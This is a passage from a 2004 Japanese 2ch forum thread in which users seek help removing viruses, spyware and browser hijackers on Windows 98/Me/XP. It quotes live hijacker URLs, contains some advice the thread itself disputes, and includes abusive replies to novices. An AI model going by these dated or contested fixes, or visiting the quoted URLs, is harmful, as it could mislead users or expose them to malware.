どうしたら消えるんでしょう。
ってか、スレに変なの貼らないでと小一時間・゚・(ノД`)・゚・。

612 :名無しさん@お腹いっぱい。:04/05/21 01:08
>>609
暗号化した通信を利用してみるとかどうだろう。
メールなんかはLAN内でパケットをモニタリングされると簡単に見られるらしいけど。

613 :名無しさん@お腹いっぱい。:04/05/21 01:10
>>611
自分にはなんともいえませんが、ネットをするときはJavaOFFとかにしておいた方が良いっす。

必要ならこっちへどうぞ
【質問】ぼるじょあ(・3・)雑質箱345【雑談】
http://pc5.2ch.net/test/read.cgi/pcqa/1084941490/

614 :名無しさん@お腹いっぱい。:04/05/21 01:23
>>611
スパイウェア、アドウェアの類だと思うからここのサイトで一通りやってみそ。
http://higaitaisaku.web.infoseek.co.jp/

ツールバーができたならツールバーのアンインストールできるかやってみる。
念のためウイルススキャンもしたほうがいいと思うよ。

615 :611:04/05/21 01:38
>>614及び、>>アンインスコのURL出してくれた方。
助かりました。_| ̄|○スイマセンお手間を取らせて。
おかげで、ツールバーは消えました。また勉強してきます……。

616 :名無しさん@お腹いっぱい。:04/05/21 01:38
あの…
>>611さんじゃないですが同じようなことで
困っているものです。

AD-aware,ウィルスバスター,Spybot等試したのですが、
いくつかスパイウェア、ウイルスが消せただけで
トップページが海外エロサイトになってしまいます。
どうしたらよいでしょうか。夜分遅くすみません。


617 :名無しさん@お腹いっぱい。:04/05/21 01:50
「規定値に戻す」をやっても駄目?

618 :名無しさん@お腹いっぱい。:04/05/21 01:51
>>616
↓で、スタートページがエロいのを解決しに逝くがよろし
ttp://sukiero.ktplan.net/erostart/

619 :名無しさん@お腹いっぱい。:04/05/21 02:24
>>609
スイッチングHub

620 :616:04/05/21 03:35
ダメでした・・・。
実行したら停止したり、必ず同じ所で
「エラーだやり直せ」と永遠に言われ続けたり。

 親父にばれたら殴られる・・・。
いったん寝ます。

621 :名無しさん@お腹いっぱい。:04/05/21 03:38
トロイの木馬型ウイルスのTROJ_MADO.Aってどんなウイルスですか?
これが入ってたみたいなんですが・・・

622 :名無しさん@お腹いっぱい。:04/05/21 04:11
>>621
ttp://www.google.com/search?q=TROJ_MADO.A&sourceid=opera&num=100&ie=utf-8&oe=utf-8

623 :名無しさん@お腹いっぱい。:04/05/21 04:17
>>621
君、それは、パターンファイル206で表示される名前で、
208で名称変更されてるじゃないの。
最新パッチ当てなきゃダメだよ。
で、最新パッチは…

最新版情報
パターンファイル
893 (1.893.00)

アホかお前は。

624 :名無しさん@お腹いっぱい。:04/05/21 05:48
パソコン初心者なんですがウイルスに感染してしまいました。よくわからないのですがBackdoor.HackdDefenderに感染してるとウイルス検出したらでてきました。どうしたらいいんですか?

625 :名無しさん@お腹いっぱい。:04/05/21 09:01
DriveImageで一年前の状態に戻してからなぜかオンラインスキャンが出来ません、ウィルスでしょうか?
トレンドもシマンテックもです。『インストールして実行しますか?』のそれがインストール出来ない様です
シマンテックのセキュリティスキャンは出来ます
hostsは問題ない無いようです、AVGでスキャンしても何も出ません

IE6.0XPSP1

626 :名無しさん@お腹いっぱい。:04/05/21 09:06
>>624
消したらいいと思います。
飼いたいのならそのまま。

>>620
親父さんの方が詳しそうだから、ここは泣きつけ。

627 :名無しさん@お腹いっぱい。:04/05/21 09:27
ホスト・ドメイン名で特定の文字列があるとき弾くようなFirewallありますか?
たとえば*.krとかまとめて遮断できるような。

628 :名無しさん@お腹いっぱい。:04/05/21 10:26
>>627
DNS参照しなきゃならんから、FWだと遅くなりそう。
地道にIP収集するしかないのでは?

629 :名無しさん@お腹いっぱい。:04/05/21 12:21
>>627
>>628 の言うとおりだが、「CKRH(←中韓台香)、IP」とかでぐぐれば
リストは手に入る。しかしcomは弾けないし、鯖立ていてスパムを減少
させたい場合とか以外はあまり意味ないだろう


630 :名無しさん@お腹いっぱい。:04/05/21 12:52
そうですか。IPをリストから一括で登録する方向で進めて行こうと思います。
サンクスでした。

631 :名無しさん@お腹いっぱい。:04/05/21 13:06
600以下のスレにトロイのソースが貼ってあるのかな?
マカフィーがトロイだと反応しております。
605がそうなんですか?
それとも621に反応したのかな?

632 :名無しさん@お腹いっぱい。:04/05/21 13:26
この一週間ほど、このPCからはメールを送ってなかったのに
今日、「メール添付ファイルにウィルス類が見つかりました。」という
メールが来ました。
差出人は RAV AntiVirus <ravms@mailgw.tcp-net.ad.jp> からで、
内容は、私が ohmiya@tcp-ip.or.jp へ送ったメールの添付ファイルにウィルスが見つかり、ファイルを
削除したので、以下のサイトでウィルスを駆除した上で再度送信してください、と書いてあって、
3つほどサイトのアドレスが書いてありました。←まだ見てませんが。。。
ohmiya@tcp-ip.or.jp というところへメールを送った覚えはないのですが、何でこんなのが来たのでしょう???


633 :名無しさん@お腹いっぱい。:04/05/21 13:32
あんたが保菌者と言うことだろう。
汚いからこっちに来るな。
まずウイルススキャンかけろ。
話はそれからだ。

634 :名無しさん@お腹いっぱい。:04/05/21 13:34
>>632
既出。過去レス参照。
【正式】ウィルス情報&質問 総合スレッド☆Part19
http://pc5.2ch.net/test/read.cgi/sec/1083586576/も参照。


635 :ウィルス?:04/05/21 14:01
教えてください。
先日までADSLをルーターを通して2台でインターネットしていました。
1台に戻す事になったのでルーターを外してパソコンとADSLモデムを
直接つなぐとネットには繋がるのですが、再起動を繰り返す様になってしまいました。
ADSLモデムからパソコンを外すと再起動しなくなるのですが・・・。
OSを再インストールしても変わりませんでした、ノートンをインストールすると
再起動はしなくなったのですが重くて使い辛い状態です。一体何が原因でしょうか?
ルーターは違う所で使う事になったので戻せないし・・・。
機種は1年ぐらい前に買ったXPのノートです。

636 :名無しさん@お腹いっぱい。:04/05/21 14:08
http://default-homepage-network.com/start.cgi?hkcu
↑のURLを踏んでしまい、なんか英語のポップアップが
でたりするウィルスなのですが、困ってます。
対処方法とかありませんでしょうか?

637 :名無しさん@お腹いっぱい。:04/05/21 14:12
エロサイトに行って、「ダウンロードしてインストールしますか?」の画面が出てきたら、
はい、をクリックしては絶対にダメ!
はい、をクリックするとどうなるかと言うと、
C:\WINDOWS\Downloaded Program Files
ここにActiveXコントロールをダウンロードされて、
Temporary Internet Filesにダウンロードしたファイルを使って、
IEを始め、OSを改変されてしまう。
手口はこんなもん。
サービス、スタートアップ、タスクスケジューラー
これらに、IEのホームアドレスページ、ツールバー、サーチエンジン
これらの設定レジストリを毎回起動時に書き替えて、ツールでレジストリの修正をしても
結果的に無効にしている。

638 :名無しさん@お腹いっぱい。:04/05/21 14:23
エロサイトに行って、「ダウンロードしてインストールしますか?」の画面が出てきたら、
はい、をクリックしては絶対にダメ!
はい、をクリックするとどうなるかと言うと、
C:\WINDOWS\Downloaded Program Files
ここにActiveXコントロールをダウンロードされて、
Temporary Internet Filesにダウンロードしたファイルを使って、
IEを始め、OSを改変されてしまう。
手口はこんなもん。
サービス、スタートアップ、タスクスケジューラー
これらに、IEのホームアドレスページ、ツールバー、サーチエンジンを
毎回、起動時に書き替えるプログラムを登録するので、
ツールでレジストリの修正をしても結果的に無効にしている。

639 :名無しさん@お腹いっぱい。:04/05/21 14:38
>>635
ウィルスチェックしろ。話はそれからだ。
おそらくSasserなどにやられている。
ファイヤーウォールは有効にする。
WindowsUpdateもする。
いままではルータで守られてたんだろう。

640 :635:04/05/21 14:51
>>639
レスありがとうございます!
ウィルスチェックはしてみましたが大丈夫みたいでした。
Sasseってレジストリに書き込まれるヤツでしたっけ?
リカバリじゃ直らないんですか?

641 :名無しさん@お腹いっぱい。:04/05/21 15:18
NISにある秘密情報保護(キーワード警告のような機能)
を持っているフリーのヤシってないですかね?




642 :名無しさん@お腹いっぱい。:04/05/21 15:36
スクリプトがActiveXを呼び出すの知ってる?
http://homepage3.nifty.com/tef-room/virus/securepedo-1.html
http://akademeia.info/main/lecture1/tokubetu_activex.htm
ここに書いてあるのも完全じゃないかもしれないけれど、
スクリプトが勝手に実行されてしまうのは、セキュリティホールが存在しているからだ。
http://www.itmedia.co.jp/help/howto/security/special/

643 :名無しさん@お腹いっぱい。:04/05/21 17:14
ウイルスチェックをしてたら、感染してたので
exeのファイルを消してたら、ウィンドズ98が起動しなく
なってしまいました。電源入れて起動しても
「windows98」という画面は出るのですが、その後真っ黒の
画面になって文字化けした文字がでるだけで、キーボードの
ボタンを押すと、自動的に電源が切れてしまいます。
今は別のPCからアクセスしてますが、もうこのpcは使い物に
ならないのでしょうか?どうか助けてください

644 :名無しさん@お腹いっぱい。:04/05/21 17:45
>>643
ウイルスによって、システムの1部が冒されてしまったようだね。
Win98なら、システムの復元で、3日位前の状態に戻すしかないな。
それでもダメなら(多分駄目だろうけど、、、)OSの再設定しかないよ。

Me やXP なら1ヶ月以上前の状態に戻せるので、回復の可能性はあるんだけど、
98や98SEだと3〜4日前にしか戻せないので、厳しいだろうね。。。
ウイルスに感染したのが1〜2日前なら、正常に回復する可能性は
あるけどね・・・

645 :名無しさん@お腹いっぱい。:04/05/21 17:50
>>644
ありがとうございます
osはwindows98なのですが、恐れ入りますが
osの再設定とはどのように行えばよいのでしょうか?
ウイルス感染は今日の正午で、重要なファイル等は
最悪復元できなくなってもかまいません。
最低限ネットができるようになればいいのですが

646 :名無しさん@お腹いっぱい。:04/05/21 18:03
なんのexeファイルを消したんだか

ついでにWin98にシステムの復元なんざ無い

647 :名無しさん@お腹いっぱい。:04/05/21 18:08
IT詳しい人に聞きたいんだけど、
ハッカーとかって、HP開設者の個人情報どの程度までよめるの?

一番上手だとプロバイダーかなんかもぐって名前や住所も特定できるの?

648 :名無しさん@お腹いっぱい。:04/05/21 18:10
Win98は「システムの復元」じゃないけど、レジストリの巻き戻しできるよ。

1.電源を入れたらF8キー連打でメニューを表示させる。
2.メニューが表示されたらコマンドプロンプトモードで起動。
3.「SCANREG /RESTORE」とコマンドを入力(小文字でもOK)
4.数日前の日付を選択して起動。

起動ディスクがあれば、それを挿しっぱなしにして起動すれば上の1と2の操作は不要。
ただ、素人さんにはちょっと難しいかもしれんね。
私はこれで何回か回復させた事があるけど。

exeファイルが消えちゃったとすれば、この操作でも戻らない。
メーカー製PCならリカバリディスクがあるはずなので、それを使って全てまっさらにした方が良いと思う。

649 :名無しさん@お腹いっぱい。:04/05/21 18:16
>>647
http://pc5.2ch.net/pcqa/

650 :名無しさん@お腹いっぱい。:04/05/21 18:20
>>645
> ウイルス感染は今日の正午で、

これは、あなたがウイルスチェックによって気付いたのが今日の午後という
ことであって、感染したのはもっと以前だと思われます。
ます、システムの復元ですが、PCの電源を入れたらすぐにF8を連打。
黒い画面が出たら、4を選択して、[ scanreg ]を入力して、Enterキー。
後は画面の指示に従って、2〜4日前の状態に戻して再起動。

システムの復元(Win98は、レジストリの復元と呼ばれている)で回復できなければ、
OSの再設定しかない。購入時の状態に戻すのに60分位かかります。
PCに付属している取り扱い説明書を熟読してください。やり方は簡単ですが、
起動ディスクとリカバリCD(これも購入時に付属しています)を確認して、前準備を
しっかり行ってください。再設定後は、自分で入れたソフトのインストールや
Winのアップデート(セキュリティーホール修復等)が必要になります。

651 :名無しさん@お腹いっぱい。:04/05/21 18:25
>>646
あまりにも無知杉!

652 :名無しさん@お腹いっぱい。:04/05/21 18:35
>>651
(゚д゚)ハァ?

653 :名無しさん@お腹いっぱい。:04/05/21 18:37
>システムの復元(Win98は、レジストリの復元と呼ばれている)
お前の脳内だけで勘弁

654 :名無しさん@お腹いっぱい。:04/05/21 18:55
>>616
618の通りにやってないだろ。

655 :名無しさん@お腹いっぱい。:04/05/21 18:58
>>652-653
馬鹿丸出しやん (w
哀れ・・・

656 :名無しさん@お腹いっぱい。:04/05/21 18:58
653はリア厨房だろ。

657 :名無しさん@お腹いっぱい。:04/05/21 18:59
帰宅しました…。
>>626 親父もパソコン初心者です。

今、IE関連レジストリを完全リセットしました。
するとIE押したらマイクロソフトにいくのですが、
数分たつとまたttp://jksearch.biz/redir.phpに
ホームがもどってしまいます。
どういうことが考えられるでしょうか?


658 :名無しさん@お腹いっぱい。:04/05/21 19:04
>>651=655=656
いいから98でscanreg /restoreがシステムの復元と呼ばれてるまともなネタ元出せよ

659 :名無しさん@お腹いっぱい。:04/05/21 19:18
>>658
ttp://haiiro.info/my/text/template.html

660 :654:04/05/21 19:22
>>657
本当に>>618の通りにやったのですか?

661 :名無しさん@お腹いっぱい。:04/05/21 19:36
643ですが、>>648さんと>>650さんの方法で
なんとかバックアップに成功しました
ほんと助かりました ありがとうございます

662 :657:04/05/21 19:47
実は何回やってもエラーになってできなかったものが
あります。
特にMEの再インストールは何度やっても「失敗、やりなおせ」と
言われます。


663 :654:04/05/21 20:12
>657
618をどのステップまで進んだか書いて、
今の状態もちゃんと618に従ってレポートしてくれ。

664 :名無しさん@お腹いっぱい。:04/05/21 23:37
始めまして
最近XPをリカバリしたんですけどアップデートする時にも
感染するって聞いたのですが、みなさんどうやって
リカバリ後のアップデートしてるんですか?

665 :名無しさん@お腹いっぱい。:04/05/21 23:40
>>664
(゚Д゚)ハァ?

666 :名無しさん@お腹いっぱい。:04/05/21 23:54
>>664
1 ルータ使う
2 PFW使う
3 WindowsUpdateカタログで必要なもの落としておいてオフラインでアップデートする。

667 :名無しさん@お腹いっぱい。:04/05/21 23:55
ノートン先生を導入しようと思ってるんですが、
ノートンインターネットセキュリティーの方は無くても大丈夫でしょうか?

ルータに一応はブロックする機能があるみたいだし、導入しようか悩んでるんですが

ファイアーウォールを入れたほうが良いというなら、何かオススメのソフトも教えてください

668 :名無しさん@お腹いっぱい。:04/05/22 00:04
>>667
NISじゃなくてNAVにしようとしてるってこと?
ルータあるならNAVで良いんじゃない
けど心配ってならNISにしろ

669 :名無しさん@お腹いっぱい。:04/05/22 00:05
>>667
使ったことないからよう知らんがノートンさんのPFWは重いとの話。
漏れ的にはフリーで十分だと思うから
↓で調べて自分で決めなはれ。

【PFW】フリーファイアウォールベスト2
http://pc5.2ch.net/test/read.cgi/sec/1074431848/

670 :名無しさん@お腹いっぱい。:04/05/22 00:10
>>668-669
サンクス

参考にします
今のところNISはややこしいような気がするのでNAVとフリーで逝こうと思っておりまする

671 :664:04/05/22 00:22
>>666
2 PFW使う

何ですかそれ?

672 :名無しさん@お腹いっぱい。:04/05/22 00:23
ウソーン

673 :名無しさん@お腹いっぱい。:04/05/22 00:28
>671
ttp://www.google.com/search?q=PFW+%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3&ie=UTF-8&hl=ja&lr=lang_ja

674 :657:04/05/22 01:05
 すみませんパソコンそのものの異常で
だいぶ遅くなってしまいました。
 まず、新しくわかった事を書きます。
ひとつにはjksearch.biz、というのに
かかっているようです。
 そこで

675 :657:04/05/22 01:11
 そこで>>16のサイトにいき、
「jksearch.biz、greatsearch.bizの除去」と
いうものを試みたのですが、そこの
「PCを再起動後、「C:\WINDOWS\system32\system32.dll」を削除」が
どうしてもできません。
 セーフモードでも拒否されました。
どうしたら削除できましょうか。夜分遅くすみません。
当方、MEでIEは6.0です。どうかよろしく致します。


676 :名無しさん@お腹いっぱい。:04/05/22 01:35
>>675
おー、もっともらしい名前だなぁ、system32.dllって。
回復コンソールで消せないかな。
Win上で、WinのCDを入れて
Q:\i386\winnt32 /cmdcons
で入る(ドライブ名は適宜)。
リブートすると「回復コンソール」って選択肢が現れるから、
コマンドラインで削除。

677 :名無しさん@お腹いっぱい。:04/05/22 01:37
あ、すまん、MEなのか。
回復コンソールはNT以降だ。
うーん、FAT32でも認識する様な起動ディスクは持ってないの?

678 :名無しさん@お腹いっぱい。:04/05/22 01:41
要は、使用中のDLLだから消せない訳でしょ。
って事は、system32.dllを使うプロセスが生きてるって事か?
regeditでその名前を検索して削除するとか、
Shift押下でWin起動(スタートアッププログラムを起動しない)とか、
使用中のDLLまで表示してくれるプロセスビューアで該当プロセスを殺すとか、
まだ手はある筈だ。

679 :657:04/05/22 01:49
レスありがとうございます!
起動ディスクはパソコン本体の付属品しか
ありません。
 ちなみにさっきの4分前のエラーメッセージは
windowsが使ってるから、というものでした。

680 :名無しさん@お腹いっぱい。:04/05/22 01:50
>>675
試してみれば。
http://pc5.2ch.net/test/read.cgi/sec/1052242064/191

681 :657:04/05/22 02:00
やってみます!


682 :名無しさん@お腹いっぱい。:04/05/22 02:15
すみません。お取り込み中のところ質問です。

ここ数日、どこかのリンクを踏んだのか何なのか、
別のポップアップ広告が出てきたり、バナーが書き換えられたりして参っております。

飛ばされる場所はだいたい決まってて「messagebroadcaster.com」ってところです。
(ココはちなみに今工事中です。ヤバイかも知れないので、一応皆様見ないように)

どうやら、いろいろ調べてみたんですが、このタイプはSpybot、Ad-wareでは駆除が
できないみたいなんです。
(日本語でググッテも出てこないので、英文でググッたら、フォーラムがいくつかあったけど
結局そういうことで、解決されていないのばかり) 

では「Hijackthis」に挑戦しようと思いつつも、原因がわからないので何のファイルを
を消していいのかわからないし。当然、ここ数日のCookieファイルを消してみてもダメです。
後はコンテンポラリーファイルを消すしかないでしょうか。
どうしたらいいんでしょうか.…困った。

最悪、IEを見捨てて、別のブラウザにすれば問題は起きないんでしょうか?
原因がわからんとなんともいえない。
ちなみにそのPCではメール受信はしてません。別のPCでしてます。

何か情報お持ちの人がいたらお願いします。

683 :名無しさん@お腹いっぱい。:04/05/22 02:17
>>682追記。
ちなみにOSはWin2Kです。ブラウザはIE。よろしくおながいします。

684 :名無しさん@お腹いっぱい。:04/05/22 02:21
>>682 またまた追記…何度もすみません。

IEのスタートページは別に変わりません。ただ、どこかのリンクをクリックして
別のページに行くたびに、ポップアップページが別に出てきます。
あと、バナーがあるページは、全部外国の他のバナーに書き換えられます。
(広告は別にエロ系というわけではなく、この件でスパイウェアばかり検索してるせいか、
最近出てくるのは、スパイウェアやウィルス検索ソフトの広告などです)

一見ウザイだけで、無害に見えたんですが、英語サイトでは
「親切で、無害に見えるが、システムがフリーズしたりクラッシュしたりして、厄介者」
と書かれてました。それ以上の詳細はちょっと不明。。。

685 :名無しさん@お腹いっぱい。:04/05/22 03:09
パソコンを起動していると、一日に何回か、何の入力もしてないのに、
HDDが一分間くらいの間、断続的に動きます。
ADSLのモデムを見ると、その時、通信されてるようです。
初心者なりに考えたのですが、誰かに侵入されてるか、どこかに私のPCの情報を
送るソフトを仕込まれてるのではないかと思うのですが。
何が起こってるか、確かめる方法があれば教えて下さい。
OSはWIN98SE、プロバイダはYAHOOBBの8M、ノートンのアンチウィルス、ファイアー
ウォールをいれています。 あと、一ヶ月に一回くらい、ad-awareとspy-botを使ってます。
よろしくお願いします。


686 :名無しさん@お腹いっぱい。:04/05/22 03:14
ちみも657みたいに618のサイトで解決するかもよ。見た目はあれだが優れたサイトだよ。

687 :名無しさん@お腹いっぱい。:04/05/22 03:15
スマソ。686は>>682ね。

688 :657:04/05/22 03:21
とりあえず敵は削除できました!
これも皆さんのおかげです。
本当に感謝しています!!

実は問題はまだ残ってはいるのですが
さすがに体力の限界なので今日はここで
失礼させて頂きます。
本当にありがとうございました。




689 :名無しさん@お腹いっぱい。:04/05/22 05:30
すみません、>>682です。
>>686-687氏、レスありがd。

Ad-awareを更新せずにスキャンしてたみたい?で(更新してたつもりだったのだが)
Ad-aware6でさらにアップデートして、セーフモードでも起動して確認して
無事駆除いたしました。_| ̄|○トホホ

正体は、「CliantMan」ってやつでした。
調べてみたら、かなり嫌なスパイウェア…。漏れの秘密は大丈夫かいな。

で、先ほど、勝手に繋がる問題のサイトを運営してる会社のサイト(whoisで出ます)にも
「迷惑かけてスマソ」と、解決方法は載せてるみたいですが、
どうやら、シマンテック的にはお勧めできないようです。

何にせよ、夜中に1人で大騒ぎしてすんません。ご報告まで。
や、やっと寝られる…。

690 :名無しさん@お腹いっぱい。:04/05/22 05:32
>>689訂正。
誤:「CliantMan」 → 正「ClientMan」です。

今日はマジでダメだ…寝よう…。

691 :624:04/05/22 06:54
昨日カキコしたものですが電源を切ってまた入れてもダメでした。インターネットしようとした所、H系サイトのページにかってにいってしまいます。どのようにすればよいでしょうか?

692 :名無しさん@お腹いっぱい。:04/05/22 07:06
《応急処置》
WEB見ててブラウザが変になったらとりあえず以下を実行。ブラクラ、ジョークソフト、
ブラウザジャッカー、スパイウェアなどの迷惑ソフトの8割はこれで撃退できますよん。

1) 閉じない窓を強制的に閉じる→alt+F4
2) IEのホーム、検索ページを標準に戻す→ツール→インターネットオプション→
  プログラム→WEB設定のリセット(作業中頻繁に実行してください。無限ループ防止)
3)IEの履歴削除→ツール→インターネットオプション→全般→インターネット
  一時ファイル→クッキーの削除+ファイルの削除
4) 削除したいファイルがあるが「アクセスできません。使用中です」とかいわれて
  削除できない→セーフモード(F8を連打)でOSを起動→削除→OS再起動
5) 勝手に追加されたアプリをアンインストする→スタート→コントロールパネル→
  アプリケーションの追加と削除(JWordはここでアンインストのこと)→OS再起動
6) 定番駆除ツールで駆除  a)→b)→c)の順に実行してください。
 a)CoolWebShredder 他のツールで駆除しにくいブラウザジャッカーCoolWebSearch
  専用の駆除ツールです。まずこれから実行。
  http://higaitaisaku.web.infoseek.co.jp/removecws.html#jyokyo 
  または本家 ttp://www.spywareinfo.com/~merijn/downloads.html→OS再起動
 b) Ad-Aware http://www.lavasoftusa.com/ (更新頻度高)
 c) Spybot-S&D http://www.safer-networking.org/ (強力だが更新頻度低)
8)Me/XPの場合「システムの復元」で直近の正常な状態に復帰させる、という手もアリ。
 [スタート]→[すべてのプログラム]→[アクセサリ]→[システム ツール]
  →[システムの復元]

693 :名無しさん@お腹いっぱい。:04/05/22 09:12
初心者向きのアンチウィルスソフトってありますか?
フリー版で

694 :名無しさん@お腹いっぱい。:04/05/22 09:36
>>682
コンテンポラリー、ナイス!

695 :名無しさん@お腹いっぱい。:04/05/22 10:23
win2000、zonealarmで
stopボタンでネット接続を遮断すると、 ログに
services and contoroller appからのoutgoingが
10分おきくらいにあるのですが、
これは何なんでしょうか・・

696 :名無しさん@お腹いっぱい。:04/05/22 10:27
>>695
マルチ乙
【セキュリティ】ZoneAlarm Part19
http://pc5.2ch.net/test/read.cgi/sec/1084801676/178

697 :名無しさん@お腹いっぱい。:04/05/22 12:40
チクリ乙

698 :名無しさん@お腹いっぱい。:04/05/22 12:54
アオリ乙

699 :名無しさん@お腹いっぱい。:04/05/22 13:28
>>693

ノートンくらい買えよ

700 :名無しさん@お腹いっぱい。:04/05/22 13:46
すみませんが質問よろしいでしょうか?

当方Norton antiVirusの2002を使っています。
そろそろ購読サービス期限が切れるころだったので
購読を続けるためにをサービスの延長をシマンテックでおこなって
LiveUpdateを実行したのですが、

LiveUpdate が利用可能なシマンテック製品とコンポーネントの
更新版のカタログファイルを取り込めませんでした。
インターネットに接続できることを確認して
LiveUpdate を再び実行してください。

と出て更新することができません。
ちなみにネットは繋いでいます。
どうすれば更新することができるのでしょうか?
お願いします。

701 :名無しさん@お腹いっぱい。:04/05/22 14:06
アンチウィルスソフトっていっぱいあるけど
安いやつでも大丈夫なんですかね?
たとえば ソースネクストの1980円のとかあるんですけど。
現在は何も入っていません。

702 :名無しさん@お腹いっぱい。:04/05/22 14:08
>>699
フリーではないのでしょうか・・・・日本語版とか
OSはXPです・・・

703 :名無しさん@お腹いっぱい。:04/05/22 14:15
Shields UP
のやり方がマッタク分からないのですが・・・日本語のサイとありませんか?

704 :名無しさん@お腹いっぱい。:04/05/22 14:20
>702

>1-20

705 :名無しさん@お腹いっぱい。:04/05/22 14:22
>>702
どんな場合でも自分の身を守るには自分で努力するか金を払うかしかない。
それがいやなら氏ね。
【有料無料】アンチウイルスソフトPart2【問わず】
http://pc5.2ch.net/test/read.cgi/software/1060661400/

706 :名無しさん@お腹いっぱい。:04/05/22 14:23
>>703
簡単だがわかりやすい
http://www.geocities.jp/outpost_2ch/setting.html#1

707 :名無しさん@お腹いっぱい。:04/05/22 14:23
>>702
貧乏人かつ初心者はネットにつなぐな。

708 :名無しさん@お腹いっぱい。:04/05/22 14:24
>>700
金払ってるのならそこに訊け。

709 :名無しさん@お腹いっぱい。:04/05/22 14:33
ゾーンラブスって無料のファイアーウォールなの?
公式行っても英語ばかりで解らなかった・・・。

あとファイアーウォール入れることで不具合が起こったりはしないのかな?
2ちゃんに書き込めなくなるって言うのをどこかで見た気がするんだけど。

710 :名無しさん@お腹いっぱい。:04/05/22 14:36
>>708
土日は営業日ではなくて電話をかけてもだめだったもので・・・
オンラインウイルススキャンをかけたら5つもウイルスが入っていて
一刻も早く削除したかったもので・・・

月曜まで待ってみます。

711 :名無しさん@お腹いっぱい。:04/05/22 14:46
フリーの定番アンチウィルス比較

AVG   常駐保護あり 日本語対応
Antivir  常駐保護あり 日本語ファイル名、パス名に非対応
Antidote 常駐保護なし 日本語対応

検出能力はAntidoteが高いが、常駐保護機能がないので単独では
意味ナシ。AntivirかAVGのいずれかと組み合わせて使うとよい。

感覚的にはAntivirのほうがAVGより動作が軽く、スキャンもやや速いよう
に思えるが、日本語ファイル名に対応していないのは欠点。(2バイト文字
を含む日本製ウィルスには対応している)

…あとはぐぐってくれ。

712 :711:04/05/22 14:48
ウィルス情報はトレンドマイクロのデータベースを見ろ。シマンテックの
データベースは「ノートン使え」というばかりで不親切。トレンドのDBは
手動駆除の方法が詳しく出ている。

http://www.trendmicro.co.jp/vinfo/

713 :名無しさん@お腹いっぱい。:04/05/22 14:51
>>709
Zone Labs で具グレ、馬鹿たれ。


714 :名無しさん@お腹いっぱい。:04/05/22 14:54
>>711
とても丁寧にありがd、AVGは日本語対応だったんですか・・・・

715 :名無しさん@お腹いっぱい。:04/05/22 14:55
英語わからんような奴、自分で調べられない奴は
フリー使わず買いなさい。
金ないとか言う奴はネットすんな。

716 :名無しさん@お腹いっぱい。:04/05/22 14:56
>>715
調べられるから大丈夫ですね・・・有難う御座います

717 :名無しさん@お腹いっぱい。:04/05/22 15:16
Shields UP !で全ての重要なポートを検査して、
Openが無ければセキュリティは完璧なんでしょうか、
Closedばかりで安心しているのですが、ステルスがあまり無いんですが・・・・どうなんでしょうか、

718 :名無しさん@お腹いっぱい。:04/05/22 15:23
>>717
Shields UP ! Open Closed ステルス でググレよ

719 :名無しさん@お腹いっぱい。:04/05/22 15:34
証明書失効リストって何に使うもの?
http://64.94.110.11/

720 :名無しさん@お腹いっぱい。:04/05/22 18:09
>>717
完璧にしたいならPCの電源入れるな。

>>719
まず、ぐぐって来い。

721 :486:04/05/22 18:54
>>487さん
なるほど、コレがスパイウェアというものなんですね。
助言してくれたのに、超亀レスで申し訳ないです。
今日やっとPCに触れたのでSpybotというもののver1.3でスキャンしてみたところ、
いろんな名前がでるわでるわ・・・
メモったので一応書いておきます。
・GAIN.Gator
・Alexa Related
・Avenue.Inc
・Blaze Find.search enhancer.IST BAR
・CnsMin
・DSO Exploit
・GAIN.Dashbar
・Media Plex
・speedD elivery
なんかもう逝ってよしな感じの数ですが、とりあえず
CnsMinとDSO Exploitを残して駆除できたようです。
とりあえずもう一度アダルトサイト被害対策の部屋を読んで、
対策練ってみます。

722 :名無しさん@お腹いっぱい。:04/05/22 18:56
最近よく聞くキンタマウィルスって普通のウィルススキャンで
見つけられますか?

723 :名無しさん@お腹いっぱい。:04/05/22 19:21
OS XP home SP1
ウィルス対策の有無 NAV2004
ルータ NTT ADSLモデム-MNV

ルータにDMZホスト機能ってありますよね?
これのLAN側のIPアドレスを、適当なアドレス(192.168.100.99など)に
指定しておくとセキュリティが上がるよって教えてもらったんですけど本当でしょうか?
ググッてみると、逆に下がりそうな気がするのですが。

724 :名無しさん@お腹いっぱい。:04/05/22 19:46
>>722
ダウソ板に引っ込んでろ。

>>723 その機能を無効に出来るならそうしろ。
出来ないでそんな回避方法しかないなら、そんな腐ったルータは捨てろ。

725 :486:04/05/22 20:57
Spybotで再度スキャンしてみたところ、
駆除したはずのAvenue A.Incとやらが復活していました。
被害対策の部屋に書いてあったAvenue.Incとは名前が微妙に違うので、
亜種か変種だと思っているのですが・・。
概要はクッキーの追跡らしいですが、これはネットで通販したりすると
かなりまずいのでしょうか?


726 :名無しさん@お腹いっぱい。:04/05/22 21:22
ウィルス対策ソフトを購入予定ですがどれがいいでしょう?
製品によってかなり価格にばらつきがありますが、特長や欠点も
教えていただけると助かります。
候補としては

・シマンテック ノートンインターネットセキュリティ
・マカフィー ウィルススキャン
・トレンドマイクロ ウィルスバスター
・ソースネクスト ウィルスセキュリティ
・NECインターチャネル V3ウィルスブロック
・デジターボ ウィルスドクター
・メガソフト ウィルスプロテクターV4

などがあります。上3つがメジャーっぽく、また価格も高めですが、
下の方のソフトとはなにが、どう違っているのかサイトなどを見ても
よく判りません。
ご教示よろしくお願いします。

727 :名無しさん@お腹いっぱい。:04/05/22 21:33
>>725
クッキーくらいグチャグチャ言ってないで削除しる
user@atdmt[2].txt

728 :名無しさん@お腹いっぱい。:04/05/22 21:38
>>726
ノートンかウィルスバスターがよさげ。
2004ならウィルスバスターのがよりよさげ。

729 :名無しさん@お腹いっぱい。:04/05/22 22:06
へんなセールスのメールが来るのですがどういう仕組みなのか良く分かりません。

ヘッダを見るとメールの送信者のアドレスがAだとしたら受信者(自分)のアドレスもAなんです。
受信者は自分なのでアドレスはBなんですが、そうして自分のところに届くのでしょう。
Aのアドレスを見たら自分のアカウント一文字違うだけで後は一緒です。
同じISP加入者からのメールです。どんなカラクリなのでしょうか?

To: <abcd@*.ne.jp>
From: <abcd@*.ne.jp>

このTo: <abcd@*.ne.jp>が自分のメールアドレスになるのが普通だと思うのですが
From: <abcd@*.ne.jp>と同一なんです。これなら自分に届くはず無いのに。。

これって自分が自分に送るってことになりますよね。

あーわけわからん( ´_ゝ`)

730 :名無しさん@お腹いっぱい。:04/05/22 22:12
そのまま記憶からも消去汁

731 :名無しさん@お腹いっぱい。:04/05/22 22:20
>>729
言ってる事がよく判らないんだけどさ、
 To: 誰か
 From: 誰か
 Bcc: おまえ
って事じゃなく?
